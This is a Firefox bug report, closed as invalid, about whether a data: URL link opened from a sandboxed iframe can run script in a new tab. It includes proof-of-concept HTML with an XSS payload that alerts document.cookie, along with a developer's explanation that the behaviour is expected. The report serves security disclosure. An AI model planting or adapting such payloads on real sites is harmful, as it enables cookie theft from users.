In a sandboxed iframe, a data: URL opened in a new tab can lead to XSS (Firefox should disable javascript execution when a Sandboxed iframe contains a webpage with a data: URL opened in a new tab)

RESOLVED INVALID

Status

()

Firefox
Untriaged
RESOLVED INVALID
a year ago
a year ago

People

(Reporter: Jordi Chancel, Unassigned)

Tracking

53 Branch
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

a year ago
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
Build ID: 20170413192749

Steps to reproduce:


-1) Go to "iframe-sandbox.html"

-2) The webpage into te sandboxed iframe contains a link with a data URL

-3) Open the link in a new tab

iframe-sandbox.html source:

<html>
<body>
<b>XSS in iframe sandbox using <u>"data:" URL</u> opened in a new tab</b><br> 
<iframe frameborder="0" sandbox="allow-same-origin" src="./iframe-src-webpage.html" ></iframe>
</body>
</html>

------
webpage.html source:

<html>
<head>
</head>
<body>
<a href=" data:text/html;html,<script>alert(document.cookie);</script>">Open Me in a new tab</a>
</body>
</html>



Actual results:

JavaScript code can be executed:

The Sandboxed iframe security can be bypassed and lead to XSS if a data URL is opened into a new tab.


Expected results:

Firefox should disable javascript execution when a Sandboxed iframe contains a webpage with a data: URL opened in a new tab.
A data URL is a document that is in the same domain as the containing document (unless you put it in a sandbox WITHOUT the allow-same-origin attribute). If you replace that link with a URL on that domain then the same thing would happen:
 * if you navigate inside the sandbox scripts are prevented
 * if you open the document in a new tab (Ctrl-click) it is no longer sandboxed and scripts run

The behavior of the data: link is as-expected and consistent with how the sandbox works and how data: urls work in Firefox. What this bug comes down to is "data url inheritance is an XSS risk" which is a) known and b) something we're measuring to see if we can change. See bug 255107 and particularly bug 1018872.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: a year ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.